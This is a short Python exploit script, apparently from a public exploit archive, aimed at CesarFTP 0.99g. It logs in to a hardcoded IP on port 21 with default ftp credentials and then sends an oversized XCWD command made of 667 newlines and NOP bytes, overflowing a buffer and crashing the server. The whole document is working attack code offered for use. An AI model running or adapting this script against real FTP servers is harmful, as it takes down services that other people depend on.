#!/usr/bin/env python #-*- coding:utf-8 -*- # Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit # Discovery by : Irving Aguilar # Email : im.aguilar@protonmail.ch # Discovery Date : 18.01.2016 # Tested Version : 0.99g # Vulnerability Type : Denial of Service (DoS) # Tested on OS : Windows XP Professional SP3 x86 es import socket buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20 target = '192.168.1.73' port = 21 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((target, port)) print '[*] Target: ' + target print '[*] Port: ' + str(port) s.recv(1024) s.send('USER ftp\r\n') s.recv(1024) s.send('PASS ftp\r\n') s.recv(1024) s.send( buffer + '\r\n') print '[+] Buffer sent' s.close()